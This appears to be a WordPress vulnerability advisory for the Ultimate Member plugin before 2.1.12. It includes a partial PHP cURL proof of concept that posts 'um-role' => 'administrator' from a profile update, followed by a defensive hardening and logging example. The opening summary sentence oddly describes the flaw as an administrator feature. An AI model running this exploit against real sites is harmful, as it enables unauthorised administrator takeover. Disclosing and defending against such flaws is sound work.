Source: wpvulndb
Author: Chloe Chamberland
WPVDB-ID: DD4C4ECE-7206-4788-8747-F0C0F3AB0A53
Published: Nov 09, 2020 - 12:00 a.m.

Ultimate Member < 2.1.12 - Authenticated Privilege Escalation via Profile Update

2020-11-09 00:00:00
Chloe Chamberland
Source: wpscan.com
5

EPSS: 0.006 (Low), percentile 78.8%

Because Ultimate Member allowed new roles to be created, the plugin also let site administrators grant secondary Ultimate Member roles to any user during a /wp-admin profile update.

PoC

```php
// (the start of the PoC, with the variable setup and the beginning of the login request, is missing from the source)
    $wp_user,
    'pwd' => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/profile.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches);
$nonce = $matches[1];

// Pull the user_id
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/profile.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
preg_match('/"checkuser_id"\svalue="([^"]+)"/', $content, $matches);
$user_id = $matches[1];

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/profile.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '%2Fwp-admin%2Fprofile.php',
    'from' => 'profile',
    'check_userid' => $user_id,
    'admin_bar_front' => '1',
    'first_name' => $name,
    'last_name' => $lastname,
    'nickname' => $nickname,
    'email' => $email,
    'url' => '',
    'description' => '',
    'pass1' => '',
    'pass2' => '',
    'um-role' => 'administrator',
    'action' => 'update',
    'user_id' => $user_id,
    'submit' => 'Update+Profile'
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
```
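A defender-side illustration of the missing check, added here as an example and not Ultimate Member's code nor the advisory's PoC: the `um-role` POST field is the one the PoC submits, the hook and capability names are WordPress core's, and the `prg_*` function names and the unsafe/safe contrast are assumptions made for illustration.

```php
<?php
/*
 * Plugin Name: Profile Role Guard (hypothetical hardening example)
 * Guards a plugin feature that lets a role be assigned from the
 * /wp-admin profile form through a POST field named "um-role".
 */

// Defect pattern (assumed for illustration, not Ultimate Member's code):
// the role comes straight from the request and is applied to the user
// being saved, with no check on who submitted the form.
function prg_unsafe_apply_role( $user_id ) {
    if ( empty( $_POST['um-role'] ) ) {
        return;
    }
    $user = get_userdata( $user_id );
    $user->add_role( sanitize_key( $_POST['um-role'] ) ); // any user may choose "administrator"
}

// Hardened form: only a submitter allowed to promote users and to edit
// this particular user may set the field, and the role must exist.
function prg_safe_apply_role( $user_id ) {
    if ( empty( $_POST['um-role'] ) ) {
        return;
    }
    if ( ! current_user_can( 'promote_users' ) || ! current_user_can( 'edit_user', $user_id ) ) {
        return; // the field is ignored for everyone else
    }
    $role = sanitize_key( wp_unslash( $_POST['um-role'] ) );
    if ( null === get_role( $role ) ) {
        return; // unknown role name
    }
    $user = get_userdata( $user_id );
    if ( $user instanceof WP_User ) {
        $user->add_role( $role ); // secondary role, as in the advisory
    }
}
add_action( 'personal_options_update', 'prg_safe_apply_role' );
add_action( 'edit_user_profile_update', 'prg_safe_apply_role' );

// Detection aid: log every role addition together with the acting user,
// so that unexpected promotions stand out in the error log or SIEM.
function prg_log_role_change( $user_id, $role ) {
    $actor = wp_get_current_user();
    error_log( sprintf( 'role "%s" added to user %d by user %d (%s)',
        $role, $user_id, $actor->ID, $actor->user_login ) );
}
add_action( 'add_user_role', 'prg_log_role_change', 10, 2 );
```

The `add_user_role` log line is also a cheap way to audit an existing site: any entry where the acting user lacks `promote_users` deserves a look.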

| CPE Name | Operator | Version |
|---|---|---|
| ultimate-member | lt | 2.1.12 |
